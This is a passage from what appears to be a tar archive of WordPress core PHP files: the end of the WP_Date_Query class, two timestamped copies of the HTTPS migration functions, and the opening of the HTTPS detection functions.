if ( ! empty( $date_query['column'] ) ) {
$date_query['column'] = esc_sql( $date_query['column'] );
} else {
$date_query['column'] = esc_sql( $default_column );
}
$this->column = $this->validate_column( $this->column );
$this->compare = $this->get_compare( $date_query );
$this->queries = $this->sanitize_query( $date_query );
}
/**
* Recursive-friendly query sanitizer.
*
* Ensures that each query-level clause has a 'relation' key, and that
* each first-order clause contains all the necessary keys from `$defaults`.
*
* @since 4.1.0
*
* @param array $queries
* @param array $parent_query
* @return array Sanitized queries.
*/
public function sanitize_query( $queries, $parent_query = null ) {
$cleaned_query = array();
$defaults = array(
'column' => 'post_date',
'compare' => '=',
'relation' => 'AND',
);
// Numeric keys should always have array values.
foreach ( $queries as $qkey => $qvalue ) {
if ( is_numeric( $qkey ) && ! is_array( $qvalue ) ) {
unset( $queries[ $qkey ] );
}
}
// Each query should have a value for each default key. Inherit from the parent when possible.
foreach ( $defaults as $dkey => $dvalue ) {
if ( isset( $queries[ $dkey ] ) ) {
continue;
}
if ( isset( $parent_query[ $dkey ] ) ) {
$queries[ $dkey ] = $parent_query[ $dkey ];
} else {
$queries[ $dkey ] = $dvalue;
}
}
// Validate the dates passed in the query.
if ( $this->is_first_order_clause( $queries ) ) {
$this->validate_date_values( $queries );
}
// Sanitize the relation parameter.
$queries['relation'] = $this->sanitize_relation( $queries['relation'] );
foreach ( $queries as $key => $q ) {
if ( ! is_array( $q ) || in_array( $key, $this->time_keys, true ) ) {
// This is a first-order query. Trust the values and sanitize when building SQL.
$cleaned_query[ $key ] = $q;
} else {
// Any array without a time key is another query, so we recurse.
$cleaned_query[] = $this->sanitize_query( $q, $queries );
}
}
return $cleaned_query;
}
/**
* Determines whether this is a first-order clause.
*
* Checks to see if the current clause has any time-related keys.
* If so, it's first-order.
*
* @since 4.1.0
*
* @param array $query Query clause.
* @return bool True if this is a first-order clause.
*/
protected function is_first_order_clause( $query ) {
$time_keys = array_intersect( $this->time_keys, array_keys( $query ) );
return ! empty( $time_keys );
}
/**
* Determines and validates what comparison operator to use.
*
* @since 3.7.0
*
* @param array $query A date query or a date subquery.
* @return string The comparison operator.
*/
public function get_compare( $query ) {
if ( ! empty( $query['compare'] )
&& in_array( $query['compare'], array( '=', '!=', '>', '>=', '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true )
) {
return strtoupper( $query['compare'] );
}
return $this->compare;
}
/**
* Validates the given date_query values and triggers errors if something is not valid.
*
* Note that date queries with invalid date ranges are allowed to
* continue (though of course no items will be found for impossible dates).
* This method only generates debug notices for these cases.
*
* @since 4.1.0
*
* @param array $date_query The date_query array.
* @return bool True if all values in the query are valid, false if one or more fail.
*/
public function validate_date_values( $date_query = array() ) {
if ( empty( $date_query ) ) {
return false;
}
$valid = true;
/*
* Validate 'before' and 'after' up front, then let the
* validation routine continue to be sure that all invalid
* values generate errors too.
*/
if ( array_key_exists( 'before', $date_query ) && is_array( $date_query['before'] ) ) {
$valid = $this->validate_date_values( $date_query['before'] );
}
if ( array_key_exists( 'after', $date_query ) && is_array( $date_query['after'] ) ) {
$valid = $this->validate_date_values( $date_query['after'] );
}
// Array containing all min-max checks.
$min_max_checks = array();
// Days per year.
if ( array_key_exists( 'year', $date_query ) ) {
/*
* If a year exists in the date query, we can use it to get the days.
* If multiple years are provided (as in a BETWEEN), use the first one.
*/
if ( is_array( $date_query['year'] ) ) {
$_year = reset( $date_query['year'] );
} else {
$_year = $date_query['year'];
}
$max_days_of_year = (int) gmdate( 'z', mktime( 0, 0, 0, 12, 31, $_year ) ) + 1;
} else {
// Otherwise we use the max of 366 (leap-year).
$max_days_of_year = 366;
}
$min_max_checks['dayofyear'] = array(
'min' => 1,
'max' => $max_days_of_year,
);
// Days per week.
$min_max_checks['dayofweek'] = array(
'min' => 1,
'max' => 7,
);
// Days per week.
$min_max_checks['dayofweek_iso'] = array(
'min' => 1,
'max' => 7,
);
// Months per year.
$min_max_checks['month'] = array(
'min' => 1,
'max' => 12,
);
// Weeks per year.
if ( isset( $_year ) ) {
/*
* If we have a specific year, use it to calculate number of weeks.
* Note: the number of weeks in a year is the date in which Dec 28 appears.
*/
$week_count = gmdate( 'W', mktime( 0, 0, 0, 12, 28, $_year ) );
} else {
// Otherwise set the week-count to a maximum of 53.
$week_count = 53;
}
$min_max_checks['week'] = array(
'min' => 1,
'max' => $week_count,
);
// Days per month.
$min_max_checks['day'] = array(
'min' => 1,
'max' => 31,
);
// Hours per day.
$min_max_checks['hour'] = array(
'min' => 0,
'max' => 23,
);
// Minutes per hour.
$min_max_checks['minute'] = array(
'min' => 0,
'max' => 59,
);
// Seconds per minute.
$min_max_checks['second'] = array(
'min' => 0,
'max' => 59,
);
// Concatenate and throw a notice for each invalid value.
foreach ( $min_max_checks as $key => $check ) {
if ( ! array_key_exists( $key, $date_query ) ) {
continue;
}
// Throw a notice for each failing value.
foreach ( (array) $date_query[ $key ] as $_value ) {
$is_between = $_value >= $check['min'] && $_value <= $check['max'];
if ( ! is_numeric( $_value ) || ! $is_between ) {
$error = sprintf(
/* translators: Date query invalid date message. 1: Invalid value, 2: Type of value, 3: Minimum valid value, 4: Maximum valid value. */
__( 'Invalid value %1$s for %2$s. Expected value should be between %3$s and %4$s.' ),
'<code>' . esc_html( $_value ) . '</code>',
'<code>' . esc_html( $key ) . '</code>',
'<code>' . esc_html( $check['min'] ) . '</code>',
'<code>' . esc_html( $check['max'] ) . '</code>'
);
_doing_it_wrong( __CLASS__, $error, '4.1.0' );
$valid = false;
}
}
}
// If we already have invalid date messages, don't bother running through checkdate().
if ( ! $valid ) {
return $valid;
}
$day_month_year_error_msg = '';
$day_exists = array_key_exists( 'day', $date_query ) && is_numeric( $date_query['day'] );
$month_exists = array_key_exists( 'month', $date_query ) && is_numeric( $date_query['month'] );
$year_exists = array_key_exists( 'year', $date_query ) && is_numeric( $date_query['year'] );
if ( $day_exists && $month_exists && $year_exists ) {
// 1. Checking day, month, year combination.
if ( ! wp_checkdate( $date_query['month'], $date_query['day'], $date_query['year'], sprintf( '%s-%s-%s', $date_query['year'], $date_query['month'], $date_query['day'] ) ) ) {
$day_month_year_error_msg = sprintf(
/* translators: 1: Year, 2: Month, 3: Day of month. */
__( 'The following values do not describe a valid date: year %1$s, month %2$s, day %3$s.' ),
'<code>' . esc_html( $date_query['year'] ) . '</code>',
'<code>' . esc_html( $date_query['month'] ) . '</code>',
'<code>' . esc_html( $date_query['day'] ) . '</code>'
);
$valid = false;
}
} elseif ( $day_exists && $month_exists ) {
/*
* 2. checking day, month combination
* We use 2012 because, as a leap year, it's the most permissive.
*/
if ( ! wp_checkdate( $date_query['month'], $date_query['day'], 2012, sprintf( '2012-%s-%s', $date_query['month'], $date_query['day'] ) ) ) {
$day_month_year_error_msg = sprintf(
/* translators: 1: Month, 2: Day of month. */
__( 'The following values do not describe a valid date: month %1$s, day %2$s.' ),
'<code>' . esc_html( $date_query['month'] ) . '</code>',
'<code>' . esc_html( $date_query['day'] ) . '</code>'
);
$valid = false;
}
}
if ( ! empty( $day_month_year_error_msg ) ) {
_doing_it_wrong( __CLASS__, $day_month_year_error_msg, '4.1.0' );
}
return $valid;
}
/**
* Validates a column name parameter.
*
* Column names without a table prefix (like 'post_date') are checked against a list of
* allowed and known tables, and then, if found, have a table prefix (such as 'wp_posts.')
* prepended. Prefixed column names (such as 'wp_posts.post_date') bypass this allowed
* check, and are only sanitized to remove illegal characters.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $column The user-supplied column name.
* @return string A validated column name value.
*/
public function validate_column( $column ) {
global $wpdb;
$valid_columns = array(
'post_date', // Part of $wpdb->posts.
'post_date_gmt', // Part of $wpdb->posts.
'post_modified', // Part of $wpdb->posts.
'post_modified_gmt', // Part of $wpdb->posts.
'comment_date', // Part of $wpdb->comments.
'comment_date_gmt', // Part of $wpdb->comments.
'user_registered', // Part of $wpdb->users.
);
if ( is_multisite() ) {
$valid_columns = array_merge(
$valid_columns,
array(
'registered', // Part of $wpdb->blogs.
'last_updated', // Part of $wpdb->blogs.
)
);
}
// Attempt to detect a table prefix.
if ( ! str_contains( $column, '.' ) ) {
/**
* Filters the list of valid date query columns.
*
* @since 3.7.0
* @since 4.1.0 Added 'user_registered' to the default recognized columns.
* @since 4.6.0 Added 'registered' and 'last_updated' to the default recognized columns.
*
* @param string[] $valid_columns An array of valid date query columns. Defaults
* are 'post_date', 'post_date_gmt', 'post_modified',
* 'post_modified_gmt', 'comment_date', 'comment_date_gmt',
* 'user_registered', 'registered', 'last_updated'.
*/
if ( ! in_array( $column, apply_filters( 'date_query_valid_columns', $valid_columns ), true ) ) {
$column = 'post_date';
}
$known_columns = array(
$wpdb->posts => array(
'post_date',
'post_date_gmt',
'post_modified',
'post_modified_gmt',
),
$wpdb->comments => array(
'comment_date',
'comment_date_gmt',
),
$wpdb->users => array(
'user_registered',
),
);
if ( is_multisite() ) {
$known_columns[ $wpdb->blogs ] = array(
'registered',
'last_updated',
);
}
// If it's a known column name, add the appropriate table prefix.
foreach ( $known_columns as $table_name => $table_columns ) {
if ( in_array( $column, $table_columns, true ) ) {
$column = $table_name . '.' . $column;
break;
}
}
}
// Remove unsafe characters.
return preg_replace( '/[^a-zA-Z0-9_$\.]/', '', $column );
}
/**
* Generates WHERE clause to be appended to a main query.
*
* @since 3.7.0
*
* @return string MySQL WHERE clause.
*/
public function get_sql() {
$sql = $this->get_sql_clauses();
$where = $sql['where'];
/**
* Filters the date query WHERE clause.
*
* @since 3.7.0
*
* @param string $where WHERE clause of the date query.
* @param WP_Date_Query $query The WP_Date_Query instance.
*/
return apply_filters( 'get_date_sql', $where, $this );
}
/**
* Generates SQL clauses to be appended to a main query.
*
* Called by the public WP_Date_Query::get_sql(), this method is abstracted
* out to maintain parity with the other Query classes.
*
* @since 4.1.0
*
* @return string[] {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
protected function get_sql_clauses() {
$sql = $this->get_sql_for_query( $this->queries );
if ( ! empty( $sql['where'] ) ) {
$sql['where'] = ' AND ' . $sql['where'];
}
return $sql;
}
/**
* Generates SQL clauses for a single query array.
*
* If nested subqueries are found, this method recurses the tree to
* produce the properly nested SQL.
*
* @since 4.1.0
*
* @param array $query Query to parse.
* @param int $depth Optional. Number of tree levels deep we currently are.
* Used to calculate indentation. Default 0.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to a single query array.
*
* @type string $join SQL fragment to append to the main JOIN clause.
* @type string $where SQL fragment to append to the main WHERE clause.
* }
*/
protected function get_sql_for_query( $query, $depth = 0 ) {
$sql_chunks = array(
'join' => array(),
'where' => array(),
);
$sql = array(
'join' => '',
'where' => '',
);
$indent = '';
for ( $i = 0; $i < $depth; $i++ ) {
$indent .= ' ';
}
foreach ( $query as $key => $clause ) {
if ( 'relation' === $key ) {
$relation = $query['relation'];
} elseif ( is_array( $clause ) ) {
// This is a first-order clause.
if ( $this->is_first_order_clause( $clause ) ) {
$clause_sql = $this->get_sql_for_clause( $clause, $query );
$where_count = count( $clause_sql['where'] );
if ( ! $where_count ) {
$sql_chunks['where'][] = '';
} elseif ( 1 === $where_count ) {
$sql_chunks['where'][] = $clause_sql['where'][0];
} else {
$sql_chunks['where'][] = '( ' . implode( ' AND ', $clause_sql['where'] ) . ' )';
}
$sql_chunks['join'] = array_merge( $sql_chunks['join'], $clause_sql['join'] );
// This is a subquery, so we recurse.
} else {
$clause_sql = $this->get_sql_for_query( $clause, $depth + 1 );
$sql_chunks['where'][] = $clause_sql['where'];
$sql_chunks['join'][] = $clause_sql['join'];
}
}
}
// Filter to remove empties.
$sql_chunks['join'] = array_filter( $sql_chunks['join'] );
$sql_chunks['where'] = array_filter( $sql_chunks['where'] );
if ( empty( $relation ) ) {
$relation = 'AND';
}
// Filter duplicate JOIN clauses and combine into a single string.
if ( ! empty( $sql_chunks['join'] ) ) {
$sql['join'] = implode( ' ', array_unique( $sql_chunks['join'] ) );
}
// Generate a single WHERE clause with proper brackets and indentation.
if ( ! empty( $sql_chunks['where'] ) ) {
$sql['where'] = '( ' . "\n " . $indent . implode( ' ' . "\n " . $indent . $relation . ' ' . "\n " . $indent, $sql_chunks['where'] ) . "\n" . $indent . ')';
}
return $sql;
}
/**
* Turns a single date clause into pieces for a WHERE clause.
*
* A wrapper for get_sql_for_clause(), included here for backward
* compatibility while retaining the naming convention across Query classes.
*
* @since 3.7.0
*
* @param array $query Date query arguments.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string[] $join Array of SQL fragments to append to the main JOIN clause.
* @type string[] $where Array of SQL fragments to append to the main WHERE clause.
* }
*/
protected function get_sql_for_subquery( $query ) {
return $this->get_sql_for_clause( $query, '' );
}
/**
* Turns a first-order date query into SQL for a WHERE clause.
*
* @since 4.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query Date query clause.
* @param array $parent_query Parent query of the current date query.
* @return array {
* Array containing JOIN and WHERE SQL clauses to append to the main query.
*
* @type string[] $join Array of SQL fragments to append to the main JOIN clause.
* @type string[] $where Array of SQL fragments to append to the main WHERE clause.
* }
*/
protected function get_sql_for_clause( $query, $parent_query ) {
global $wpdb;
// The sub-parts of a $where part.
$where_parts = array();
$column = ( ! empty( $query['column'] ) ) ? esc_sql( $query['column'] ) : $this->column;
$column = $this->validate_column( $column );
$compare = $this->get_compare( $query );
$inclusive = ! empty( $query['inclusive'] );
// Assign greater- and less-than values.
$lt = '<';
$gt = '>';
if ( $inclusive ) {
$lt .= '=';
$gt .= '=';
}
// Range queries.
if ( ! empty( $query['after'] ) ) {
$where_parts[] = $wpdb->prepare( "$column $gt %s", $this->build_mysql_datetime( $query['after'], ! $inclusive ) );
}
if ( ! empty( $query['before'] ) ) {
$where_parts[] = $wpdb->prepare( "$column $lt %s", $this->build_mysql_datetime( $query['before'], $inclusive ) );
}
// Specific value queries.
$date_units = array(
'YEAR' => array( 'year' ),
'MONTH' => array( 'month', 'monthnum' ),
'_wp_mysql_week' => array( 'week', 'w' ),
'DAYOFYEAR' => array( 'dayofyear' ),
'DAYOFMONTH' => array( 'day' ),
'DAYOFWEEK' => array( 'dayofweek' ),
'WEEKDAY' => array( 'dayofweek_iso' ),
);
// Check of the possible date units and add them to the query.
foreach ( $date_units as $sql_part => $query_parts ) {
foreach ( $query_parts as $query_part ) {
if ( isset( $query[ $query_part ] ) ) {
$value = $this->build_value( $compare, $query[ $query_part ] );
if ( $value ) {
switch ( $sql_part ) {
case '_wp_mysql_week':
$where_parts[] = _wp_mysql_week( $column ) . " $compare $value";
break;
case 'WEEKDAY':
$where_parts[] = "$sql_part( $column ) + 1 $compare $value";
break;
default:
$where_parts[] = "$sql_part( $column ) $compare $value";
}
break;
}
}
}
}
if ( isset( $query['hour'] ) || isset( $query['minute'] ) || isset( $query['second'] ) ) {
// Avoid notices.
foreach ( array( 'hour', 'minute', 'second' ) as $unit ) {
if ( ! isset( $query[ $unit ] ) ) {
$query[ $unit ] = null;
}
}
$time_query = $this->build_time_query( $column, $compare, $query['hour'], $query['minute'], $query['second'] );
if ( $time_query ) {
$where_parts[] = $time_query;
}
}
/*
* Return an array of 'join' and 'where' for compatibility
* with other query classes.
*/
return array(
'where' => $where_parts,
'join' => array(),
);
}
/**
* Builds and validates a value string based on the comparison operator.
*
* @since 3.7.0
*
* @param string $compare The compare operator to use.
* @param string|array $value The value.
* @return string|false|int The value to be used in SQL or false on error.
*/
public function build_value( $compare, $value ) {
if ( ! isset( $value ) ) {
return false;
}
switch ( $compare ) {
case 'IN':
case 'NOT IN':
$value = (array) $value;
// Remove non-numeric values.
$value = array_filter( $value, 'is_numeric' );
if ( empty( $value ) ) {
return false;
}
return '(' . implode( ',', array_map( 'intval', $value ) ) . ')';
case 'BETWEEN':
case 'NOT BETWEEN':
if ( ! is_array( $value ) || 2 !== count( $value ) ) {
$value = array( $value, $value );
} else {
$value = array_values( $value );
}
// If either value is non-numeric, bail.
foreach ( $value as $v ) {
if ( ! is_numeric( $v ) ) {
return false;
}
}
$value = array_map( 'intval', $value );
return $value[0] . ' AND ' . $value[1];
default:
if ( ! is_numeric( $value ) ) {
return false;
}
return (int) $value;
}
}
/**
* Builds a MySQL format date/time based on some query parameters.
*
* You can pass an array of values (year, month, etc.) with missing parameter values being defaulted to
* either the maximum or minimum values (controlled by the $default_to parameter). Alternatively you can
* pass a string that will be passed to date_create().
*
* @since 3.7.0
*
* @param string|array $datetime An array of parameters or a strtotime() string.
* @param bool $default_to_max Whether to round up incomplete dates. Supported by values
* of $datetime that are arrays, or string values that are a
* subset of MySQL date format ('Y', 'Y-m', 'Y-m-d', 'Y-m-d H:i').
* Default: false.
* @return string|false A MySQL format date/time or false on failure.
*/
public function build_mysql_datetime( $datetime, $default_to_max = false ) {
if ( ! is_array( $datetime ) ) {
/*
* Try to parse some common date formats, so we can detect
* the level of precision and support the 'inclusive' parameter.
*/
if ( preg_match( '/^(\d{4})$/', $datetime, $matches ) ) {
// Y
$datetime = array(
'year' => (int) $matches[1],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})$/', $datetime, $matches ) ) {
// Y-m
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2})$/', $datetime, $matches ) ) {
// Y-m-d
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
'day' => (int) $matches[3],
);
} elseif ( preg_match( '/^(\d{4})\-(\d{2})\-(\d{2}) (\d{2}):(\d{2})$/', $datetime, $matches ) ) {
// Y-m-d H:i
$datetime = array(
'year' => (int) $matches[1],
'month' => (int) $matches[2],
'day' => (int) $matches[3],
'hour' => (int) $matches[4],
'minute' => (int) $matches[5],
);
}
// If no match is found, we don't support default_to_max.
if ( ! is_array( $datetime ) ) {
$wp_timezone = wp_timezone();
// Assume local timezone if not provided.
$dt = date_create( $datetime, $wp_timezone );
if ( false === $dt ) {
return gmdate( 'Y-m-d H:i:s', false );
}
return $dt->setTimezone( $wp_timezone )->format( 'Y-m-d H:i:s' );
}
}
$datetime = array_map( 'absint', $datetime );
if ( ! isset( $datetime['year'] ) ) {
$datetime['year'] = current_time( 'Y' );
}
if ( ! isset( $datetime['month'] ) ) {
$datetime['month'] = ( $default_to_max ) ? 12 : 1;
}
if ( ! isset( $datetime['day'] ) ) {
$datetime['day'] = ( $default_to_max ) ? (int) gmdate( 't', mktime( 0, 0, 0, $datetime['month'], 1, $datetime['year'] ) ) : 1;
}
if ( ! isset( $datetime['hour'] ) ) {
$datetime['hour'] = ( $default_to_max ) ? 23 : 0;
}
if ( ! isset( $datetime['minute'] ) ) {
$datetime['minute'] = ( $default_to_max ) ? 59 : 0;
}
if ( ! isset( $datetime['second'] ) ) {
$datetime['second'] = ( $default_to_max ) ? 59 : 0;
}
return sprintf( '%04d-%02d-%02d %02d:%02d:%02d', $datetime['year'], $datetime['month'], $datetime['day'], $datetime['hour'], $datetime['minute'], $datetime['second'] );
}
/**
* Builds a query string for comparing time values (hour, minute, second).
*
* If just hour, minute, or second is set than a normal comparison will be done.
* However if multiple values are passed, a pseudo-decimal time will be created
* in order to be able to accurately compare against.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $column The column to query against. Needs to be pre-validated!
* @param string $compare The comparison operator. Needs to be pre-validated!
* @param int|null $hour Optional. An hour value (0-23).
* @param int|null $minute Optional. A minute value (0-59).
* @param int|null $second Optional. A second value (0-59).
* @return string|false A query part or false on failure.
*/
public function build_time_query( $column, $compare, $hour = null, $minute = null, $second = null ) {
global $wpdb;
// Have to have at least one.
if ( ! isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) {
return false;
}
// Complex combined queries aren't supported for multi-value queries.
if ( in_array( $compare, array( 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true ) ) {
$return = array();
$value = $this->build_value( $compare, $hour );
if ( false !== $value ) {
$return[] = "HOUR( $column ) $compare $value";
}
$value = $this->build_value( $compare, $minute );
if ( false !== $value ) {
$return[] = "MINUTE( $column ) $compare $value";
}
$value = $this->build_value( $compare, $second );
if ( false !== $value ) {
$return[] = "SECOND( $column ) $compare $value";
}
return implode( ' AND ', $return );
}
// Cases where just one unit is set.
if ( isset( $hour ) && ! isset( $minute ) && ! isset( $second ) ) {
$value = $this->build_value( $compare, $hour );
if ( false !== $value ) {
return "HOUR( $column ) $compare $value";
}
} elseif ( ! isset( $hour ) && isset( $minute ) && ! isset( $second ) ) {
$value = $this->build_value( $compare, $minute );
if ( false !== $value ) {
return "MINUTE( $column ) $compare $value";
}
} elseif ( ! isset( $hour ) && ! isset( $minute ) && isset( $second ) ) {
$value = $this->build_value( $compare, $second );
if ( false !== $value ) {
return "SECOND( $column ) $compare $value";
}
}
// Single units were already handled. Since hour & second isn't allowed, minute must to be set.
if ( ! isset( $minute ) ) {
return false;
}
$format = '';
$time = '';
// Hour.
if ( null !== $hour ) {
$format .= '%H.';
$time .= sprintf( '%02d', $hour ) . '.';
} else {
$format .= '0.';
$time .= '0.';
}
// Minute.
$format .= '%i';
$time .= sprintf( '%02d', $minute );
if ( isset( $second ) ) {
$format .= '%s';
$time .= sprintf( '%02d', $second );
}
return $wpdb->prepare( "DATE_FORMAT( $column, %s ) $compare %f", $format, $time );
}
/**
* Sanitizes a 'relation' operator.
*
* @since 6.0.3
*
* @param string $relation Raw relation key from the query argument.
* @return string Sanitized relation. Either 'AND' or 'OR'.
*/
public function sanitize_relation( $relation ) {
if ( 'OR' === strtoupper( $relation ) ) {
return 'OR';
} else {
return 'AND';
}
}
}
https-migration-20260605175519-20260621081201.php 0000666 00000011205 15224151220 0013355 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605120603.php 0000666 00000011205 15224151220 0011761 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605111710.php 0000666 00000013341 15224151220 0011750 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
